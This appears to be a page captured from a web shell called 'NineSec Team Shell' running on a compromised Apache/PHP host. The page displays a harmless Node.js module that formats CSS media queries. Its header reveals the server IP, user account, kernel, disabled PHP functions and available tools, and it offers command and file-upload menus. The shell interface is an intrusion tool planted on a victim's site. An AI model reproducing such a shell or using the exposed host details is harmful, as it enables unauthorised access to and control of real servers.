NineSec Team Shell
Server IP : 92.205.26.207  /  Your IP : 216.73.216.16
Web Server : Apache
System : Linux 207.26.205.92.host.secureserver.net 4.18.0-553.60.1.el8_10.x86_64 #1 SMP Thu Jul 10 04:01:16 EDT 2025 x86_64
User : zikryat ( 1002)
PHP Version : 8.3.23
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/zikryat/public_html/node_modules/sprintf-js/../mediaquery-text/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/zikryat/public_html/node_modules/sprintf-js/../mediaquery-text/index.js
const cssom = require('cssom');
const os = require('os');
const CSSFontFaceRule = require('cssom/lib/CSSFontFaceRule').CSSFontFaceRule;

/**
 * Returns Media Query text for a CSS source.
 *
 * @param {String} css source
 * @api public
 */

module.exports = css => {
    const rules = cssom.parse(css).cssRules || [];
    const queries = [];
    let queryMedia;
    let queryString;
    let style;
    let property;
    let value;
    let important;
    let result;

    rules.forEach(({ type, media, cssRules }) => {
        /* CSS types
		  STYLE: 1,
		  IMPORT: 3,
		  MEDIA: 4,
		  FONT_FACE: 5,
		 */

        if (type === cssom.CSSMediaRule.prototype.type) {
            queryMedia = Array.prototype.slice.call(media).join(', ');
            queryString = [];

            queryString.push(`${os.EOL}@media ${queryMedia} {`);

            cssRules.forEach(rule => {
                if (rule.type === cssom.CSSStyleRule.prototype.type || rule.type === CSSFontFaceRule.prototype.type) {
                    queryString.push(`  ${rule.type === cssom.CSSStyleRule.prototype.type ? rule.selectorText : '@font-face'} {`);

                    for (style = 0; style < rule.style.length; style++) {
                        property = rule.style[style];
                        value = rule.style[property];
                        important = rule.style._importants[property] ? ' !important' : '';
                        queryString.push(`    ${property}: ${value}${important};`);
                    }
                    queryString.push('  }');
                }
            });

            queryString.push('}');
            result = queryString.length ? queryString.join(os.EOL) + os.EOL : '';

            queries.push(result);
        }
    });

    return queries.join(os.EOL);
};

NineSec Team - 2022